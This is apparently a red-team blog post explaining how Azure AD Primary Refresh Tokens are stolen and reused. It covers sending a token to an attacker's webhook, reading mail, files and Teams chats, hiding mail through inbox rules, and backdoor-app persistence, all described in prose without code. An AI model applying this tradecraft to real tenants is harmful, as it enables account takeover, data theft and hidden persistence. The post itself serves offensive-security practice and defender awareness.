PRT Tokens: From Initial Access to Long-Term Cloud Control

Primary Refresh Tokens (PRTs) sit at the core of Azure AD authentication, quietly enabling seamless access across cloud and hybrid environments.

While commonly treated as an implementation detail, PRTs represent a powerful attack primitive. Once obtained, they allow an adversary to maintain authenticated access long after initial compromise often surviving password resets, MFA challenges, and user logouts.

This post explores how PRT tokens can be abused to move from initial access to durable, long-term control of Azure AD backed resources.

We will examine where PRTs live, how they are issued and refreshed, and why traditional remediation steps frequently fail to invalidate them making PRT abuse one of the most effective persistence techniques in modern cloud environments.

Initial Access

In today's modern environments Red Teamers achieve initial access via multiple methods, to name a few:

• ClickFix

• ConsentFix

• SpearPhishing (Attachments)

• SpearPhishing (Links)

EDRs and AVs are increasingly attuned to the last two scenarios, particularly as email filters have become an additional focus for evasion. It's important to ensure that these emails reach the intended recipient. In these scenarios, we recognize that the primary goal of these techniques is often to achieve command execution, allowing a loader to connect back to our C2 server, initiate communication, and maintain control.

Often, when we aim for a different scenario, such as executing commands, writing a file, or querying information, it is usually considered "harmless" and is not blocked by AV/EDR systems. After considering this, why not request a token using our previous method, which targets the current user's permissions? However, in this scenario, where we don't require user interaction or rely on SSO, we can request a PRT Token.

Requesting the Token

To request the PRT token, we used the AADInternals PowerShell script. We made some modifications to ensure it didn't depend on functions tied to the AADInternals PowerShell modules. Additionally, we adjusted the script to accept a new parameter, "webhook," which sends the token to a remote host we control. With these changes, we can easily run the script and request a token.

The PRT Token can be transformed into a valid Access and Refresh Token for use by ANIMO in the "Tokens and Credential Attacks" menu. With this request and the new tokens, we can employ the Modules in ANIMO to gain deeper access to the targeted Network.

Let's examine some impacts of the PRT Token. In the following example, the attacker currently has enough access to the user's email account.

With the current access, the user can send, reply to, delete, and download attachments from emails. This shows the capability to request new access using a PRT token, focusing on different ClientIDs. Let's move forward with SharePoint/OneDrive access. This is achieved with the same Access Token used previously from the Outlook Module, ANIMO seamlessly uses already known and saved Tokens to use on the Modules.

As observed earlier, this token has granted us access to the user's workstation. To provide some context, a OneDrive linked workstation stores files in the cloud and delivers them to the user's local machine. This setup has certain advantages, one of which is that files are located in a Trusted Location. Consequently, any executed content, whether a binary or a script, does not carry the Alternate Data Stream or Mark-Of-The-Web, which would typically alert users to potentially malicious files. ANIMO has the capability to upload and download these files.

Going forward, ANIMO can query Team Chats, enabling us to gain deeper insights into personal conversations.

ANIMO offers numerous features that the Operator can access based on the Access Token and its scope. With these tokens, the operator will also be able to perform enumeration from the Sessions Tab, which is active when integrating an Access Token or Credentials into ANIMO. This integration uses the same PowerShell modules as regular terminal sessions.

The PRT Token enables us to attain a persistence level that varies from fileless methods to C2 malware, depending on the PRT and the level of access we obtained through the available scope linked to the ClientID. A straightforward example of fileless persistence, particularly focused on data exfiltration, involves modifying Outlook Rules. This modification allows us to dictate where a copy of an email is sent once certain conditions are met.

As demonstrated earlier, we have implemented rules with specific conditions, and once these conditions are fulfilled, they become active. In the previous example, emails are sent to the Deleted Items, as shown below.

ANIMO provides several well known persistence techniques in a seamless manner. Current options include Add to Group, Backdoor App, SPN Secrets, Role Assignments, and Invite Guest. These techniques enable an operator to establish persistence within an Azure tenant. OPSEC security ultimately depends on the experience and judgment of the operator. ANIMO does, however, provide guidance by outlining the required scopes, applicable resource URLs, and relevant considerations for each technique.

ANIMO includes modules that enable external attacks, such as Password Spraying, Windows Hello Business Attack, and SPN Secret Spray. These modules integrate smoothly with Python, allowing the use of well-known libraries and techniques already available in Python.

We have observed and shown the extensive access and potential impact a token can have when utilized effectively. From Initial Access to Persistence and Data Exfiltration, we have witnessed the level of control and influence an attacker can wield with these valuable pieces of data and how they can be employed.